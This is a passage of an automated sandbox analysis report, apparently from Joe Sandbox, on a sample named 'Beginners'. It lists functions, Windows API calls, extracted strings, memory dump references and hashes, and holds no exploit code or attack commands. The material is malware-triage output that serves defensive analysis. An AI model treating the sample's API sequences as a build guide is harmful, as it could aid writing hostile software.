                                          • _wcscmp.LIBCMT ref: 0010BB25
                                          • _wcsstr.LIBCMT ref: 0010BB36
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0010BB6E
                                          • _wcscmp.LIBCMT ref: 0010BB7E
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0010BBA5
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0010BBEE
                                          • _wcscmp.LIBCMT ref: 0010BBFE
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0010BC26
                                          • GetWindowRect.USER32(00000004,?), ref: 0010BC8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: 6aee3c168e0f29365c170c5984363d17eba119501fa2dd50928a7d8708f7e4a7
                                          • Instruction ID: 7bffe7ccfeb4d004fe51ea8c0b117f521a24c6e98478ac83fed4a654f3cb4c5b
                                          • Opcode Fuzzy Hash: 6aee3c168e0f29365c170c5984363d17eba119501fa2dd50928a7d8708f7e4a7
                                          • Instruction Fuzzy Hash: 7F819B710083099BEB15DF10C9C5FAAB7E8EF44314F04846AFDC99A0E6DBB4D945CB61
                                          Function 0010B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 140ef191d3ae2532014c90f31f3f254dbbcbbfcf91b146be690a0efb48a779a1
                                          • Instruction ID: 619459379ffbaa90423b3f1e95f4e023683377857c930c03e0488cd618743407
                                          • Opcode Fuzzy Hash: 140ef191d3ae2532014c90f31f3f254dbbcbbfcf91b146be690a0efb48a779a1
                                          • Instruction Fuzzy Hash: E1312BB5A48205A6CB04FB50CD83FED73B4AF21350FA00129F581B10D3EFE66E14CA52
                                          Function 0010CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000063), ref: 0010CBAA
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0010CBBC
                                          • SetWindowTextW.USER32(?,?), ref: 0010CBD3
                                          • GetDlgItem.USER32(?,000003EA), ref: 0010CBE8
                                          • SetWindowTextW.USER32(00000000,?), ref: 0010CBEE
                                          • GetDlgItem.USER32(?,000003E9), ref: 0010CBFE
                                          • SetWindowTextW.USER32(00000000,?), ref: 0010CC04
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0010CC25
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0010CC3F
                                          • GetWindowRect.USER32(?,?), ref: 0010CC48
                                          • SetWindowTextW.USER32(?,?), ref: 0010CCB3
                                          • GetDesktopWindow.USER32 ref: 0010CCB9
                                          • GetWindowRect.USER32(00000000), ref: 0010CCC0
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0010CD0C
                                          • GetClientRect.USER32(?,?), ref: 0010CD19
                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0010CD3E
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0010CD69
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 887521d4a08186d9f327e03220e44468fd359ef00fff238ee46f3e474d0ea3a1
                                          • Instruction ID: e55d19ee907eb600c5a17e575217746a305fa21eb6f64706a486bc259ffd954a
                                          • Opcode Fuzzy Hash: 887521d4a08186d9f327e03220e44468fd359ef00fff238ee46f3e474d0ea3a1
                                          • Instruction Fuzzy Hash: C9516071900709EFDB21DFA9CE89B6EBBF5FF08705F000618E686A29A0D774A954CF50
                                          Function 0013A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0013A87E
                                          • DestroyWindow.USER32(00000000,?), ref: 0013A8F8
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0013A972
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0013A994
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0013A9A7
                                          • DestroyWindow.USER32(00000000), ref: 0013A9C9
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000B0000,00000000), ref: 0013AA00
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0013AA19
                                          • GetDesktopWindow.USER32 ref: 0013AA32
                                          • GetWindowRect.USER32(00000000), ref: 0013AA39
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0013AA51
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0013AA69
                                            • Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: fdbad6964465062554367e2de7ba219994c8cb2fa54f60425e1360ed77f4810c
                                          • Instruction ID: bf3af075122a60cbd4e35d37d26267429bedc1feb817301a8203f99a79cf17b0
                                          • Opcode Fuzzy Hash: fdbad6964465062554367e2de7ba219994c8cb2fa54f60425e1360ed77f4810c
                                          • Instruction Fuzzy Hash: 9D71A872144200AFD722CF28CC48FAB7BE5EB89304F48051DF98A972A1D731E991DB62
                                          Function 0013CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DragQueryPoint.SHELL32(?,?), ref: 0013CCCF
                                            • Part of subcall function 0013B1A9: ClientToScreen.USER32(?,?), ref: 0013B1D2
                                            • Part of subcall function 0013B1A9: GetWindowRect.USER32(?,?), ref: 0013B248
                                            • Part of subcall function 0013B1A9: PtInRect.USER32(?,?,0013C6BC), ref: 0013B258
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0013CD38
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0013CD43
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0013CD66
                                          • _wcscat.LIBCMT ref: 0013CD96
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0013CDAD
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0013CDC6
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0013CDDD
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0013CDFF
                                          • DragFinish.SHELL32(?), ref: 0013CE06
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0013CEF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 169749273-3440237614
                                          • Opcode ID: 77c8d85a2325d29a7ee3fe21699c2ad247c67979c1febe502a64dc86f45463b4
                                          • Instruction ID: 7ed67afa7336bc38e483b7d15e9a52fba3603098a9df917ddc75351700383f7f
                                          • Opcode Fuzzy Hash: 77c8d85a2325d29a7ee3fe21699c2ad247c67979c1febe502a64dc86f45463b4
                                          • Instruction Fuzzy Hash: 5C614D71508301AFC711EF64DC85E9FBBF8EF99750F000A2DF695921A2DB709A49CB92
                                          Function 001182D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(00000000), ref: 0011831A
                                          • VariantCopy.OLEAUT32(00000000,?), ref: 00118323
                                          • VariantClear.OLEAUT32(00000000), ref: 0011832F
                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0011841D
                                          • __swprintf.LIBCMT ref: 0011844D
                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00118479
                                          • VariantInit.OLEAUT32(?), ref: 0011852A
                                          • SysFreeString.OLEAUT32(?), ref: 001185BE
                                          • VariantClear.OLEAUT32(?), ref: 00118618
                                          • VariantClear.OLEAUT32(?), ref: 00118627
                                          • VariantInit.OLEAUT32(00000000), ref: 00118665
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                          • API String ID: 3730832054-3931177956
                                          • Opcode ID: 3c5b1e34e2dabe24a9f83854f4a3447df14ec6fa8547d978745170e79e1f542c
                                          • Instruction ID: 94547c8605ab85a44cc2109047defb8d4f3e650c0fa140fb9a6536caa7147aaf
                                          • Opcode Fuzzy Hash: 3c5b1e34e2dabe24a9f83854f4a3447df14ec6fa8547d978745170e79e1f542c
                                          • Instruction Fuzzy Hash: 69D1EF35614215EBCB2C9F65C884BEEB7B4FF05B00F29C569E415AB692DF30D880DBA1
                                          Function 001349CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00134A61
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00134AAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 5fc5a6818f582f1ebe431b093b7a77cfc126310ccf72f5570d1befe387339548
                                          • Instruction ID: 22cabc96e590bf51c818d969d94daf902c8aeca45ea3dd36d5bef9aaf077e44b
                                          • Opcode Fuzzy Hash: 5fc5a6818f582f1ebe431b093b7a77cfc126310ccf72f5570d1befe387339548
                                          • Instruction Fuzzy Hash: 42915C342047119FCB04EF20C851AAEB7A2AF94354F11885DF8965B3A3DB31FD4ACB96
                                          Function 0011E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 0011E31F
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0011E32F
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0011E33B
                                          • __wsplitpath.LIBCMT ref: 0011E399
                                          • _wcscat.LIBCMT ref: 0011E3B1
                                          • _wcscat.LIBCMT ref: 0011E3C3
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0011E3D8
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011E3EC
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011E41E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011E43F
                                          • _wcscpy.LIBCMT ref: 0011E44B
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0011E48A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                          • String ID: *.*
                                          • API String ID: 3566783562-438819550
                                          • Opcode ID: b7b943f43cc62efb4bc2b6531a1fc03f5d41316e6beef8cb4f802b9bf1134866
                                          • Instruction ID: 12d8ca946090ff4fe4756de4bb6e647c7a5a98e483cb6035c3cd219f41570833
                                          • Opcode Fuzzy Hash: b7b943f43cc62efb4bc2b6531a1fc03f5d41316e6beef8cb4f802b9bf1134866
                                          • Instruction Fuzzy Hash: 3E6128755047459FC714EFA0C885ADEB3E8BF89310F04892EF98987252DB35EA85CB92
                                          Function 0011A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0011A2C2
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0011A2E3
                                          • __swprintf.LIBCMT ref: 0011A33C
                                          • __swprintf.LIBCMT ref: 0011A355
                                          • _wprintf.LIBCMT ref: 0011A3FC
                                          • _wprintf.LIBCMT ref: 0011A41A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 311963372-3080491070
                                          • Opcode ID: 98f08af6c85d4b9c168d1e5003453d335448d893e3bfcf9e935ec6c003a16a46
                                          • Instruction ID: 3cb8be129e934b2cfd949ff95a49bf60830cdc82ed8b175fc96fa8ce7107a6b2
                                          • Opcode Fuzzy Hash: 98f08af6c85d4b9c168d1e5003453d335448d893e3bfcf9e935ec6c003a16a46
                                          • Instruction Fuzzy Hash: FE51B171900209AACF19EBE0CD46EEEB778EF09340F500169F505B20A3EB316F99CB61
                                          Function 00110065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,000FF8B8,00000001,0000138C,00000001,00000000,00000001,?,00123FF9,00000000), ref: 0011009A
                                          • LoadStringW.USER32(00000000,?,000FF8B8,00000001), ref: 001100A3
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • GetModuleHandleW.KERNEL32(00000000,00177310,?,00000FFF,?,?,000FF8B8,00000001,0000138C,00000001,00000000,00000001,?,00123FF9,00000000,00000001), ref: 001100C5
                                          • LoadStringW.USER32(00000000,?,000FF8B8,00000001), ref: 001100C8
                                          • __swprintf.LIBCMT ref: 00110118
                                          • __swprintf.LIBCMT ref: 00110129
                                          • _wprintf.LIBCMT ref: 001101D2
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001101E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 984253442-2268648507
                                          • Opcode ID: 969879deed539c83b99977869f5c85e6ab4211d47b9ea42594dcb20a3808acc1
                                          • Instruction ID: 1ad7b79718d04d68622e085e1bba9bf1d45dcbdb55415ab57da3df68f7a3acbf
                                          • Opcode Fuzzy Hash: 969879deed539c83b99977869f5c85e6ab4211d47b9ea42594dcb20a3808acc1
                                          • Instruction Fuzzy Hash: BF416172800219AACF15EBD0CD96EEEB778EF19340F500169F505B2093DB75AF99CB61
                                          Function 0011A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • CharLowerBuffW.USER32(?,?), ref: 0011AA0E
                                          • GetDriveTypeW.KERNEL32 ref: 0011AA5B
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011AAA3
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011AADA
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011AB08
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 34d15c1c189310c42b47b1bf595c1cc5bd5e406875d9a1855557507778af550f
                                          • Instruction ID: f905076323eb6ac7f41cacc17ed4d07033e0e46465a1dc2f2c42d0d12cd7ad06
                                          • Opcode Fuzzy Hash: 34d15c1c189310c42b47b1bf595c1cc5bd5e406875d9a1855557507778af550f
                                          • Instruction Fuzzy Hash: 395169711083049FC304EF10C981DAAB7F4FF99358F50492DF896972A2DB31AE49CB52
                                          Function 0011A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0011A852
                                          • __swprintf.LIBCMT ref: 0011A874
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0011A8B1
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0011A8D6
                                          • _memset.LIBCMT ref: 0011A8F5
                                          • _wcsncpy.LIBCMT ref: 0011A931
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0011A966
                                          • CloseHandle.KERNEL32(00000000), ref: 0011A971
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0011A97A
                                          • CloseHandle.KERNEL32(00000000), ref: 0011A984
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 0a9457742002b88543ea7cd5e951ef5d57da2f472ed6cea8c81701b02e38f9f4
                                          • Instruction ID: a0dec8bbbd770eaf1d1f6d36f7b059e26c80e9b2f7225803c9ddd188f33ca56a
                                          • Opcode Fuzzy Hash: 0a9457742002b88543ea7cd5e951ef5d57da2f472ed6cea8c81701b02e38f9f4
                                          • Instruction Fuzzy Hash: FA31A375900219ABDB219FA1DC49FEB77BCEF89700F5041B6F609D21A1E77096C48B25
                                          Function 0013C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0013982C,?,?), ref: 0013C0C8
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C0DF
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C0EA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C0F7
                                          • GlobalLock.KERNEL32(00000000), ref: 0013C100
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C10F
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0013C118
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C11F
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C130
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00143C7C,?), ref: 0013C149
                                          • GlobalFree.KERNEL32(00000000), ref: 0013C159
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0013C17D
                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0013C1A8
                                          • DeleteObject.GDI32(00000000), ref: 0013C1D0
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0013C1E6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
